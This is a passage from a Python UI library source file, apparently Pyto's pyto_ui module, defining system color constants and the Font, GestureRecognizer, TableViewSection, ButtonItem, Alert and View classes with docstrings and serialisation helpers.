Initializes and returns a color that dynamically changes in dark or light mode.
:param light: :class:`~pyto_ui.Color` object to be displayed in light mode.
:param dark: :class:`~pyto_ui.Color` object to be displayed in dark mode.
:rtype: pyto_ui.Color
"""
check(light, "light", Color)
check(dark, "dark", Color)
object = cls(
__PyColor__.colorWithLight(light.__py_color__, dark=dark.__py_color__)
)
object._light = light
object._dark = dark
return object
def __eq__(self, other):
try:
return (
self.red() == other.red()
and self.green() == other.green()
and self.blue() == other.blue()
and self.alpha() == other.alpha()
)
except AttributeError:
return False
COLOR_LABEL = Color(ui_constants.COLOR_LABEL)
""" The color for text labels containing primary content. """
COLOR_SECONDARY_LABEL = Color(ui_constants.COLOR_SECONDARY_LABEL)
""" The color for text labels containing secondary content. """
COLOR_TERTIARY_LABEL = Color(ui_constants.COLOR_TERTIARY_LABEL)
""" The color for text labels containing tertiary content. """
COLOR_QUATERNARY_LABEL = Color(ui_constants.COLOR_QUATERNARY_LABEL)
""" The color for text labels containing quaternary content. """
COLOR_SYSTEM_FILL = Color(ui_constants.COLOR_SYSTEM_FILL)
""" An overlay fill color for thin and small shapes. """
COLOR_SECONDARY_SYSTEM_FILL = Color(ui_constants.COLOR_SECONDARY_SYSTEM_FILL)
""" An overlay fill color for medium-size shapes. """
COLOR_TERTIARY_SYSTEM_FILL = Color(ui_constants.COLOR_TERTIARY_SYSTEM_FILL)
""" An overlay fill color for large shapes. """
COLOR_QUATERNARY_SYSTEM_FILL = Color(ui_constants.COLOR_QUATERNARY_SYSTEM_FILL)
""" An overlay fill color for large areas containing complex content. """
COLOR_PLACEHOLDER_TEXT = Color(ui_constants.COLOR_PLACEHOLDER_TEXT)
""" The color for placeholder text in controls or text views. """
COLOR_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_BACKGROUND)
""" The color for the main background of your interface. """
COLOR_SECONDARY_SYSTEM_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_SYSTEM_BACKGROUND
)
""" The color for content layered on top of the main background. """
COLOR_TERTIARY_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_TERTIARY_SYSTEM_BACKGROUND)
""" The color for content layered on top of secondary backgrounds. """
COLOR_SYSTEM_GROUPED_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_GROUPED_BACKGROUND)
""" The color for the main background of your grouped interface. """
COLOR_SECONDARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of the main background of your grouped interface. """
COLOR_TERTIARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_TERTIARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of secondary backgrounds of your grouped interface. """
COLOR_SEPARATOR = Color(ui_constants.COLOR_SEPARATOR)
""" The color for thin borders or divider lines that allows some underlying content to be visible. """
COLOR_OPAQUE_SEPARATOR = Color(ui_constants.COLOR_OPAQUE_SEPARATOR)
""" The color for borders or divider lines that hide any underlying content. """
COLOR_LINK = Color(ui_constants.COLOR_LINK)
""" The color for links. """
COLOR_DARK_TEXT = Color(ui_constants.COLOR_DARK_TEXT)
""" The nonadaptable system color for text on a light background. """
COLOR_LIGHT_TEXT = Color(ui_constants.COLOR_LIGHT_TEXT)
""" The nonadaptable system color for text on a dark background. """
COLOR_SYSTEM_BLUE = Color(ui_constants.COLOR_SYSTEM_BLUE)
""" A blue color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GREEN = Color(ui_constants.COLOR_SYSTEM_GREEN)
""" A green color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_INDIGO = Color(ui_constants.COLOR_SYSTEM_INDIGO)
""" An indigo color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_ORANGE = Color(ui_constants.COLOR_SYSTEM_ORANGE)
""" An orange color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PINK = Color(ui_constants.COLOR_SYSTEM_PINK)
""" A pink color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PURPLE = Color(ui_constants.COLOR_SYSTEM_PURPLE)
""" A purple color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_RED = Color(ui_constants.COLOR_SYSTEM_RED)
""" A red color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_TEAL = Color(ui_constants.COLOR_SYSTEM_TEAL)
""" A teal color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_YELLOW = Color(ui_constants.COLOR_SYSTEM_YELLOW)
""" A yellow color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GRAY = Color(ui_constants.COLOR_SYSTEM_GRAY)
""" The base gray color. """
COLOR_SYSTEM_GRAY2 = Color(ui_constants.COLOR_SYSTEM_GRAY2)
""" A second-level shade of grey. """
COLOR_SYSTEM_GRAY3 = Color(ui_constants.COLOR_SYSTEM_GRAY3)
""" A third-level shade of grey. """
COLOR_SYSTEM_GRAY4 = Color(ui_constants.COLOR_SYSTEM_GRAY4)
""" A fourth-level shade of grey. """
COLOR_SYSTEM_GRAY5 = Color(ui_constants.COLOR_SYSTEM_GRAY5)
""" A fifth-level shade of grey. """
COLOR_SYSTEM_GRAY6 = Color(ui_constants.COLOR_SYSTEM_GRAY6)
""" A sixth-level shade of grey. """
COLOR_CLEAR = Color(ui_constants.COLOR_CLEAR)
""" A color object with grayscale and alpha values that are both 0.0. """
COLOR_BLACK = Color(ui_constants.COLOR_BLACK)
""" A color object in the sRGB color space with a grayscale value of 0.0 and an alpha value of 1.0. """
COLOR_BLUE = Color(ui_constants.COLOR_BLUE)
""" A color object with RGB values of 0.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_BROWN = Color(ui_constants.COLOR_BROWN)
""" A color object with RGB values of 0.6, 0.4, and 0.2 and an alpha value of 1.0. """
COLOR_CYAN = Color(ui_constants.COLOR_CYAN)
""" A color object with RGB values of 0.0, 1.0, and 1.0 and an alpha value of 1.0. """
COLOR_DARK_GRAY = Color(ui_constants.COLOR_DARK_GRAY)
""" A color object with a grayscale value of 1/3 and an alpha value of 1.0. """
COLOR_GRAY = Color(ui_constants.COLOR_GRAY)
""" A color object with a grayscale value of 0.5 and an alpha value of 1.0. """
COLOR_GREEN = Color(ui_constants.COLOR_GREEN)
""" A color object with RGB values of 0.0, 1.0, and 0.0 and an alpha value of 1.0. """
COLOR_LIGHT_GRAY = Color(ui_constants.COLOR_LIGHT_GRAY)
""" A color object with a grayscale value of 2/3 and an alpha value of 1.0. """
COLOR_MAGENTA = Color(ui_constants.COLOR_MAGENTA)
""" A color object with RGB values of 1.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_ORANGE = Color(ui_constants.COLOR_ORANGE)
""" A color object with RGB values of 1.0, 0.5, and 0.0 and an alpha value of 1.0. """
COLOR_PURPLE = Color(ui_constants.COLOR_PURPLE)
""" A color object with RGB values of 0.5, 0.0, and 0.5 and an alpha value of 1.0. """
COLOR_RED = Color(ui_constants.COLOR_RED)
""" A color object with RGB values of 1.0, 0.0, and 0.0 and an alpha value of 1.0. """
COLOR_WHITE = Color(ui_constants.COLOR_WHITE)
""" A color object with a grayscale value of 1.0 and an alpha value of 1.0. """
COLOR_YELLOW = Color(ui_constants.COLOR_YELLOW)
""" A color object with RGB values of 1.0, 1.0, and 0.0 and an alpha value of 1.0. """
try:
if not COLOR_CLEAR.__py_color__.objc_class.name.endswith("PyColor"): # Something went wrong, retry
del sys.modules["ui_constants"]
del sys.modules["pyto_ui"]
import pyto_ui as _ui
globals().update(_ui.__dict__)
except AttributeError:
pass
# MARK: - Font
class Font:
"""
A ``Font`` object represents a font (with name and size) to be used on labels, buttons, text views etc.
"""
__ui_font__ = None
def __init__(self, name: str, size: float):
"""
Initializes a font with given name and size.
:pram name: The fully specified name of the font. This name incorporates both the font family name and the specific style information for the font.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
"""
check(name, "name", [str, None])
check(size, "size", [float, int, None])
if name is None and size is None:
return
self.__ui_font__ = __UIFont__.fontWithName(name, size=CGFloat(size))
def configure_from_dictionary(self, obj):
try:
size = float(obj)
self.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
except ValueError:
try:
parts = obj.split("-")
name_parts = parts.copy()
del name_parts[-1]
name = "-".join(name_parts)
self.__init__(name, float(parts[-1]))
except ValueError:
self.__init__(obj, FONT_SYSTEM_SIZE)
def dictionary_representation(self):
return f"{str(self.__ui_font__.fontName)}-{float(self.__ui_font__.pointSize)}"
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__ui_font__.description)+">"
def with_size(self, size: float) -> Font:
"""
Returns a font object that is the same as the receiver but which has the specified size instead.
:param size: The desired size (in points) of the new font object. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = self.__class__(None, None)
font.__ui_font__ = self.__ui_font__.fontWithSize(CGFloat(size))
return font
@classmethod
def font_names_for_family_name(cls, name: str) -> List[str]:
"""
Returns an array of font names available in a particular font family.
:param name: The name of the font family. Use the :func:`~pyto_ui.font_family_names` function to get an array of the available font family names on the system.
:rtype: List[str]
"""
check(name, "name", [str])
names = __UIFont__.fontNamesForFamilyName(name)
py_names = []
for name in names:
py_names.append(str(name))
return py_names
@classmethod
def system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items in the specified size.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
return font
@classmethod
def italic_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in italic type in the specified size.
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.italicSystemFontOfSize(CGFloat(size))
return font
@classmethod
def bold_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in boldface type in the specified size
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.boldSystemFontOfSize(CGFloat(size))
return font
@classmethod
def font_with_style(cls, style: FONT_TEXT_STYLE) -> Font:
"""
Returns an instance of the system font for the specified text style and scaled appropriately for the user's selected content size category.
:param style: The text style for which to return a font. See `Font Text Style <constants.html#font-text-style>`_ constants for possible values.
:rtype: pyto_ui.Font
"""
check(style, "style", [str])
font = cls(None, None)
font.__ui_font__ = __UIFont__.preferredFontForTextStyle(style)
return font
# MARK: - Gesture Recognizer
class GestureRecognizer:
"""
A gesture-recognizer object—or, simply, a gesture recognizer—decouples the logic for recognizing a sequence of touches (or other input) and acting on that recognition. When one of these objects recognizes a common gesture or, in some cases, a change in the gesture, it sends an action message to each designated target object.
This class represents the type of gesture passed to the ``type`` initializer parameter. See `Gesture Type <constants.html#gesture-type>`_ constants for possible values.
When the gesture is starting, cancelling or changig, ``action`` is called with the gesture recognizer as parameter. You can then access the location and the state from it.
Example:
.. highlight:: python
.. code-block:: python
'''
Move a circle with finger.
'''
import pyto_ui as ui
view = ui.View()
view.background_color = ui.COLOR_SYSTEM_BACKGROUND
circle = ui.View()
circle.size = (50, 50)
circle.center = (view.width/2, view.height/2)
circle.flexible_margins = True
circle.corner_radius = 25
circle.background_color = ui.COLOR_LABEL
view.add_subview(circle)
def move(sender: ui.GestureRecognizer):
if sender.state == ui.GESTURE_STATE_CHANGED:
circle.center = sender.location
gesture = ui.GestureRecognizer(ui.GESTURE_TYPE_PAN)
gesture.action = move
view.add_gesture_recognizer(gesture)
ui.show_view(view)
"""
__py_gesture__ = None
def __init__(
self, type: GESTURE_TYPE, action: Callable[[GestureRecognizer], None] = None
):
if type.objc_class == __PyGestureRecognizer__:
self.__py_gesture__ = type
else:
self.__py_gesture__ = __PyGestureRecognizer__.newRecognizerWithType(type)
self.__py_gesture__.managedValue = _values.value(self)
if action is not None:
self.action = action
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_gesture__.managed.description)+">"
__x__ = []
__y__ = []
@property
def x(self) -> float:
"""
(Read Only) Returns the X position of the gesture in its container view.
:rtype: float
"""
try:
return self.__x__[0]
except IndexError:
return None
@property
def y(self) -> float:
"""
(Read Only) Returns the Y position of the gesture in its container view.
"""
try:
return self.__y__[0]
except IndexError:
return None
@property
def location(self) -> Tuple[float, float]:
"""
(Read Only) Returns a tuple with the X and the Y position of the gesture in its container view.
:rtype: Tuple[float, float]
"""
tup = (self.x, self.y)
if tup == (None, None):
return None
else:
return tup
@property
def view(self) -> "View":
"""
(Read Only) Returns the view associated with the gesture.
:rtype: View
"""
view = self.__py_gesture__.view
if view is None:
return None
else:
_view = View()
_view.__py_view__ = view
return _view
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the gesture recognizer is enabled.
:rtype: bool
"""
return self.__py_gesture__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_gesture__.enabled = new_value
__number_of_touches__ = None
@property
def number_of_touches(self) -> int:
"""
(Read Only) Returns the number of touches involved in the gesture represented by the receiver.
:rtype: int
"""
if self.__number_of_touches__ is not None:
return self.__number_of_touches__
else:
return self.__py_gesture__.numberOfTouches
__state__ = None
@property
def state(self) -> GESTURE_STATE:
"""
(Read Only) The current state of the gesture recognizer.
:rtype: `Gesture State <constants.html#gesture-state>`_
"""
if self.__state__ is not None:
return self.__state__
else:
return self.__py_gesture__.state
@property
def requires_exclusive_touch_type(self) -> bool:
"""
A Boolean indicating whether the gesture recognizer considers touches of different types simultaneously.
:rtype: bool
"""
return self.__py_gesture__.requiresExclusiveTouchType
@requires_exclusive_touch_type.setter
def requires_exclusive_touch_type(self, new_value: bool):
self.__py_gesture__.requiresExclusiveTouchType = new_value
@property
def delays_touches_ended(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a end phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesEnded
@delays_touches_ended.setter
def delays_touches_ended(self, new_value: bool):
self.__py_gesture__.delaysTouchesEnded = new_value
@property
def delays_touches_began(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a begin phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesBegan
@delays_touches_began.setter
def delays_touches_began(self, new_value: bool):
self.__py_gesture__.delaysTouchesBegan = new_value
@property
def cancels_touches_in_view(self) -> bool:
"""
A Boolean value affecting whether touches are delivered to a view when a gesture is recognized.
:rtype: bool
"""
return self.__py_gesture__.cancelsTouchesInView
@cancels_touches_in_view.setter
def cancels_touches_in_view(self, new_value: bool):
self.__py_gesture__.cancelsTouchesInView = new_value
@property
def allowed_touch_types(self) -> List[TOUCH_TYPE]:
"""
An array of touch types used to distinguish type of touches. For possible values, see ``Touch Type`` constants.
:rtype: List[`Touch Type <constants.html#touch-type>`_]
"""
return self.__py_gesture__.allowedTouchTypes
@allowed_touch_types.setter
def allowedTouchTypes(self, new_value: List[TOUCH_TYPE]):
self.__py_gesture__.allowedTouchTypes = new_value
@property
def action(self) -> Callable[[GestureRecognizer], None]:
"""
A function called to handle the gesture. Takes the sender gesture recognizer as parameter.
:rtype: Callable[[GestureRecognizer], None]
"""
action = self.__py_gesture__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[GestureRecognizer], None]):
if new_value is None:
self.__py_gesture__.action = None
else:
self.__py_gesture__.action = _values.value(new_value)
@property
def minimum_press_duration(self) -> float:
"""
The minimum time that the user must press on the view for the gesture to be recognized.
(Only works for long press gestures)
:rtype: float
"""
return self.__py_gesture__.minimumDuration
@minimum_press_duration.setter
def minimum_press_duration(self, new_value) -> float:
self.__py_gesture__.minimumDuration = new_value
# MARK: - Table View Section
class TableViewSection:
"""
An object representing a section in a Table View.
A section has a title and a list of cells contained in.
"""
__py_section__ = None
_parent = None
def configure_from_dictionary(self, dictionary):
if "title" in dictionary and dictionary["title"] is not None:
self.title = dictionary["title"]
if "cells" in dictionary and dictionary["cells"] is not None:
cells = []
for cell in dictionary["cells"]:
if isinstance(cell, View):
cell = cell.dictionary_representation()
_cell = TableViewCell()
_cell._parent = self._parent
_cell.configure_from_dictionary(cell)
cells.append(_cell)
self.cells = cells
def dictionary_representation(self):
cells = []
for cell in self.cells:
cells.append(cell.dictionary_representation())
d = {
"title": self.title,
"cells": cells
}
return d
def __init__(self, title: str = "", cells: List["TableViewCell"] = []):
self.__py_section__ = __PyTableViewSection__.new()
self.__py_section__.managedValue = _values.value(self)
self.title = title
self.cells = cells
def __del__(self):
self.__py_section__.releaseReference()
self.__py_section__.release()
def __setattr__(self, name, value):
if name == "__py_section__":
previous = self.__py_section__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
#value.retain()
super().__setattr__(name, value)
@property
def table_view(self) -> "TableView":
"""
(Read Only) Returns the Table view associated with the section.
:rtype: TableView
"""
table_view = self.__py_section__.tableView
if table_view is None:
return None
else:
py_table_view = TableView()
py_table_view.__py_view__ = table_view
return py_table_view
@property
def title(self) -> str:
"""
The title of the section displayed on screen.
:rtype: str
"""
return str(self.__py_section__.title)
@title.setter
def title(self, new_value: str):
self.__py_section__.title = new_value
@property
def cells(self) -> "TableViewCell":
"""
Cells contained in the section. After setting a value, the section will be reloaded automatically.
:rtype: TableViewCell
"""
cells = self.__py_section__.cells
py_cells = []
for cell in cells:
py_cell = TableViewCell()
py_cell.__py_view__ = cell
py_cells.append(py_cell)
return py_cells
@cells.setter
def cells(self, new_value: "TableViewCell"):
cells = []
for cell in new_value:
cells.append(cell.__py_view__)
self.__py_section__.cells = cells
@property
def did_select_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is selected. Takes the sender section and the selected cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didSelectCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_select_cell.setter
def did_select_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didSelectCell = None
else:
self.__py_section__.didSelectCell = _values.value(new_value)
@property
def did_tap_cell_accessory_button(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when the accessory button of a cell contained in the section is pressed. Takes the sender section and the cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.accessoryButtonTapped
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_tap_cell_accessory_button.setter
def did_tap_cell_accessory_button(
self, new_value: Callable[[TableViewSection, int], None]
):
if new_value is None:
self.__py_section__.accessoryButtonTapped = None
else:
self.__py_section__.accessoryButtonTapped = _values.value(new_value)
@property
def did_delete_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is deleted. Takes the sender section and the selected deleted cell's index as parameters.
This function should be used to remove the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didDeleteCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_delete_cell.setter
def did_delete_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didDeleteCell = None
else:
self.__py_section__.didDeleteCell = _values.value(new_value)
@property
def did_move_cell(self) -> Callable[[TableViewSection, int, int], None]:
"""
A function called when a cell contained in the section is moved. Takes the sender section, the moved deleted cell's index and the destination index as parameters.
This function should be used to move the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int, int], None]
"""
action = self.__py_section__.didMoveCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_move_cell.setter
def did_move_cell(self, new_value: Callable[[TableViewSection, int, int], None]):
if new_value is None:
self.__py_section__.didMoveCell = None
else:
self.__py_section__.didMoveCell = _values.value(new_value)
# MARK: - Button Item
class ButtonItem:
"""
A special kind of button that can be placed on the view's navigation bar. Can have a title, and image or a system type.
"""
__py_item__ = None
_system_item = None
_style = None
_get_function = None
_parent = None
def __del__(self):
self.__py_item__.releaseReference()
self.__py_item__.release()
def __setattr__(self, name, value):
if name == "__py_item__":
previous = self.__py_item__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
value.retain()
super().__setattr__(name, value)
def dictionary_representation(self):
dict = {}
if self.title is not None:
dict["title"] = self.title
if self.image is not None and isinstance(self.image, Image.Image):
dict["image"] = self.image.filename
if self._system_item is not None:
for key in list(globals().keys()).copy():
if key.startswith("SYSTEM_ITEM_") and globals()[key] == self._system_item:
dict["system_item"] = key.split("SYSTEM_ITEM_")[1].lower()
dict["enabled"] = self.enabled
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable["):
value = getattr(self, name)
if callable(value) and "__self__" in dir(value) and value.__self__ == self:
dict[name] = "self."+value.__name__
except AttributeError:
continue
return dict
def configure_from_dictionary(self, dictionary):
def get(key, _dict=dictionary, default=None):
try:
return _dict[key]
except KeyError:
return default
if "connections" in dictionary:
def _get_connections(key, default=None):
return get(key, _dict=dictionary["connections"], default=default)
self._get_function = _get_connections
system_item = get("system_item")
if system_item is not None:
name = "SYSTEM_ITEM_"+(system_item.upper())
self._system_item = globals()[name]
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(self._system_item)
self.title = get("title")
if get("image") is not None:
if os.path.isfile(get("image")):
self.image = Image.open(get("image"))
else:
self.image = image_with_system_name(get("image"))
self.enabled = get("enabled", default=True)
View._decode_functions(self)
def __init__(
self,
title: str = None,
image: "Image" = None,
system_item: SYSTEM_ITEM = None,
style: BUTTON_ITEM_STYLE = __v__("BUTTON_ITEM_STYLE_PLAIN"),
):
if style == "BUTTON_ITEM_STYLE_PLAIN":
style = BUTTON_ITEM_STYLE_PLAIN
if system_item is not None:
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(system_item)
self._system_item = system_item
else:
self.__py_item__ = __PyButtonItem__.alloc().initWithStyle(style)
self._style = style
self.__py_item__.managedValue = _values.value(self)
self.title = title
self.image = image
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_item__.managed.description)+">"
@property
def title(self) -> str:
"""
The title of the button displayed on screen.
:rtype: str
"""
title = self.__py_item__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_item__.title = new_value
@property
def image(self) -> "Image.Image":
"""
A ``PIL`` image object displayed on screen. May also be an ``UIKit`` ``UIImage`` symbol. See :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_item__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_item__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_item__.image = new_value
else:
self.__py_item__.image = __ui_image_from_pil_image__(new_value)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the button is enabled.
:rtype: bool
"""
return self.__py_item__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_item__.enabled = new_value
@property
def style(self) -> BUTTON_ITEM_STYLE:
"""
The button item style. See `Button Item Style <constants.html#button-item-style>`_ constants for possible values.
:rtype: `Button Item Style <constants.html#button-item-style>`_
"""
return self.__py_item__.style
@style.setter
def style(self, new_value: BUTTON_ITEM_STYLE):
self.__py_item__.style = new_value
@property
def action(self) -> Callable[[ButtonItem], None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[ButtonItem], None]
"""
action = self.__py_item__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[ButtonItem], None]):
if new_value is None:
self.__py_item__.action = None
else:
self.__py_item__.action = _values.value(new_value)
# MARK: - Padding
class Padding:
"""
Padding with custom values.
"""
top: float = None
""" Top padding """
bottom: float = None
""" Bottom padding """
left: float = None
""" Left padding """
right: float = None
""" Right padding """
def __init__(
self, top: float = 0, bottom: float = 0, left: float = 0, right: float = 0
):
self.top = top
self.bottom = bottom
self.left = left
self.right = right
if "widget" not in os.environ:
# MARK: - Alert
class Alert:
"""
A class representing an alert.
Example:
.. highlight:: python
.. code-block:: python
from pyto_ui import Alert
alert = Alert("Hello", "Hello World!")
alert.add_action("Ok")
alert.add_cancel_action("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
__pyAlert__ = None
def __init__(self, title: str, message: str):
"""
Creates an alert.
:param title: The title of the alert.
:param message: The message of the alert.
"""
self.__pyAlert__ = __PyAlert__.alloc().init()
self.__pyAlert__.title = title
self.__pyAlert__.message = message
__actions__ = []
def add_action(self, title: str):
"""
Adds an action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addAction(title)
def add_destructive_action(self, title: str):
"""
Adds a destructive action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addDestructiveAction(title)
def add_cancel_action(self, title: str):
"""
Adds a cancel action with given title. Can only be added once.
:param title: The title of the action.
"""
if not self.__pyAlert__.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self) -> str:
"""
Shows alert.
Returns the title of the selected action.
:rtype: str
"""
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
return self.__pyAlert__._show(script_path)
######################
# MARK: - View Classes
######################
class View:
"""
An object that manages the content for a rectangular area on the screen.
"""
__py_view__ = None
_parent = None
def _get(self, key, _dict, default=None):
try:
return _dict[key]
except KeyError:
return default
def configure_from_dictionary(self, dictionary):
if self.__py_view__ is None:
self.__init__()
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
if "connections" in dictionary:
def _get_connections(key, default=None):
return get(key, _dict=dictionary["connections"], default=default)
self._get_function = _get_connections
self.name = get("name")
if get("frame") is not None:
self.frame = tuple(get("frame"))
if get("size") is not None:
self.size = tuple(get("size"))
topbar = get("topbar")
if topbar is not None:
hidden = get("hidden", topbar, False)
title = get("title", topbar)
self.navigation_bar_hidden = hidden
self.title = title
self.flex = get("flex", default=[])
subviews = get("children", default=[])
for view in subviews:
if view == "Spacer":
if not isinstance(self, StackView):
raise NotImplementedError("Spacers can only have a 'StackView' instance as their super view.")
self.add_subview(_StackSpacerView())
elif isinstance(view, View):
view._parent = self
view._decode_functions()
self.add_subview(view)
else:
view = _from_json(view)
view._parent = self
view._decode_functions()
self.add_subview(view)
self.hidden = get("hidden", default=False)
self.alpha = get("alpha", default=1)
self.opaque = get("opaque", default=False)
if get("background_color") is not None:
bg_color = Color.__new__(Color)
bg_color.configure_from_dictionary(get("background_color"))
self.background_color = bg_color
if get("tint_color") is not None:
tint_color = Color.__new__(Color)
tint_color.configure_from_dictionary(get("tint_color"))
self.tint_color = tint_color
self.user_interaction_enabled = get("user_interaction", default=True)
self.clips_to_bounds = get("clips_to_bounds", default=False)
self.corner_radius = get("corner_radius", default=0)
self.border_width = get("border_width", default=0)
if get("border_color") is not None:
border_color = Color.__new__(Color)
border_color.configure_from_dictionary(get("border_color"))
self.border_color = border_color
if get("content_mode") is not None:
content_mode = ("content_mode_"+get("content_mode")).upper()
self.content_mode = globals()[content_mode]
if get("appearance") is not None:
appearance = ("appearance_"+get("appearance")).upper()
self.appearance = globals()[appearance]
button_items = []
if get("button_items") is not None:
for item in get("button_items"):
b_item = ButtonItem()
b_item._parent = self
b_item.configure_from_dictionary(item)
button_items.append(b_item)
self.button_items = button_items
self._decode_functions()
_get_function = None
def _decode_functions(self):
get = self._get_function
if get is None:
return
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable[") and get(name) is not None:
try:
setattr(self, name, eval(get(name), sys.modules["__main__"].__dict__, locals()))
except NameError:
def try_with_parent(parent):
if get(name) in dir(parent):
return getattr(parent, get(name))
elif parent._parent is not None:
return try_with_parent(parent._parent)
else:
return None
setattr(self, name, try_with_parent(self))
except AttributeError:
continue
def dictionary_representation(self) -> dict:
subviews = []
for view in self.subviews:
if isinstance(view, _StackSpacerView):
subviews.append("Spacer")
else:
subviews.append(view.dictionary_representation())
bg_color = self.background_color
if bg_color is not None:
bg_color = bg_color.dictionary_representation()
tint_color = self.tint_color
if tint_color is not None and self._set_tint_color:
tint_color = tint_color.dictionary_representation()
border_color = self.border_color
if border_color is not None:
border_color = border_color.dictionary_representation()
content_mode = None
for key in list(globals().keys()).copy():
if key.startswith("CONTENT_MODE_") and globals()[key] == self.content_mode:
content_mode = key.lower().split("content_mode_")[1]
if self.appearance == APPEARANCE_DARK and self._set_appearance:
appearance = "dark"
elif self.appearance == APPEARANCE_LIGHT and self._set_appearance:
appearance = "light"
else:
appearance = None
button_items = []
for item in self.button_items:
button_items.append(item.dictionary_representation())
d = {
"class": ".".join([self.__class__.__module__, self.__class__.__name__]),
"name": self.name,
"frame": self.frame,
"topbar": {
"hidden": self.navigation_bar_hidden,
"title": self.title
},
"flex": self.flex,
"children": subviews,
"hidden": self.hidden,
"alpha": self.alpha,
"opaque": self.opaque,
"background_color": bg_color,
"tint_color": tint_color,
"user_interaction": self.user_interaction_enabled,
"clips_to_bounds": self.clips_to_bounds,
"corner_radius": self.corner_radius,
"border_width": self.border_width,
"border_color": border_color,
"content_mode": content_mode,
"appearance": appearance,
"button_items": button_items
}
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable["):
value = getattr(self, name)
